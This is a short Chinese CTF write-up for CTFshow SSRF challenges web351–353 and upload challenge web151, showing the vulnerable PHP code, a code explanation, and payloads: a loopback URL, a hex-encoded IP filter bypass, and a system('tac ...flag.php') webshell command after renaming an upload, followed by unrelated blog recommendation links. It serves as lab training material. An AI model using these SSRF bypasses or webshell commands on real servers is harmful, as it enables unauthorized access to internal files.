CTFshow-SSRF&文件上传

web351

复制代码
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

构造POST

url=http://127.0.0.1/flag.php

web352

复制代码
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

代码分析

复制代码
error_reporting(0); 这一行关闭了所有PHP错误报告,这在生产环境中可能是为了保持用户体验的干净,但在开发过程中关闭错误报告不是一个好习惯,因为它会使调试更加困难。
highlight_file(__FILE__); 这行代码的作用是显示当前文件的源代码。当这个PHP脚本被执行时,它会高亮显示自身的代码。这通常用于学习或展示代码的目的,但它也可能无意中暴露了源代码,带来安全隐患。
$url = $_POST['url']; 这行代码从POST请求中获取名为url的参数值,将其赋值给变量$url。
$x = parse_url($url); 使用parse_url()函数解析$url,并返回一个关联数组,其中包含了URL的不同部分(如方案、主机名等)。
if($x['scheme'] === 'http' || $x['scheme'] === 'https') { ... } else { die('hacker'); } 这段条件语句检查解析后的URL是否使用的是HTTP或HTTPS协议。如果不是这两种协议之一,则程序终止执行,并输出'hacker',这可能是为了阻止尝试利用其他协议进行的攻击。
在检查协议之后,代码进一步检查URL中是否包含localhost或127.0.0(通常代表本地回环地址)。这是通过preg_match()函数完成的。如果匹配成功(即URL试图访问本地资源),则程序也会终止执行并输出'hacker'。
如果上述两个检查都通过了,代码将继续执行。它使用cURL库来发送HTTP请求到提供的URL,并通过设置选项CURLOPT_RETURNTRANSFER为1来确保响应体被作为字符串返回而不是直接输出。然后,通过curl_exec()执行请求,并将结果存储在变量$result中。
最后,echo ($result); 输出从远程服务器接收到的内容。

同上

web353

复制代码
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> 

用16进制绕过

POST

url=http://0x7f.0.0.1/flag.php

web151

只能上传png格式的图片

bp改个后缀名

命令执行

1=system("tac /var/www/html/flag.php");

1=system("tac /var/www/html/flag.php");

相关推荐
无敌最俊朗@36 分钟前
TCP/IP 四层模型协作流程详解
服务器·网络·网络协议·tcp/ip·dubbo
会飞的小蛮猪41 分钟前
运维之路(SSH工具集)
运维·经验分享·工具
梅见十柒43 分钟前
Linux/UNIX系统编程手册笔记:POSIX
linux·服务器·网络·笔记·tcp/ip·udp·unix
IT成长日记1 小时前
【Nginx开荒攻略】静态文件服务深度解析:MIME类型映射与优化实战
linux·运维·服务器·nginx·mime
卷Java2 小时前
智慧停车大屏数据分析与设计文档
java·大数据·人工智能·数据分析
深圳南柯电子2 小时前
纯电汽车emc整改:设计缺陷到合规达标的系统方案|深圳南柯电子
网络·人工智能·汽车·互联网·实验室·emc
弗里德姆2 小时前
DIY主机无网络安装PVE全记录:手机热点+笔记本网络共享实战
服务器·网络·pve
孟意昶2 小时前
Spark专题-第三部分:性能监控与实战优化(1)-认识spark ui
大数据·数据仓库·sql·ui·spark·etl
科技风向标2 小时前
2025 随身 WiFi 行业报告:格行 WiFi6 技术下放百元市场,中兴华为机型竞争力分析;五款机型芯片方案 / 网速 / 质保深度横评
网络·科技·物联网·华为·随身wifi·格行
wanhengidc2 小时前
云手机服务器多开需要注意哪些
运维·服务器·智能手机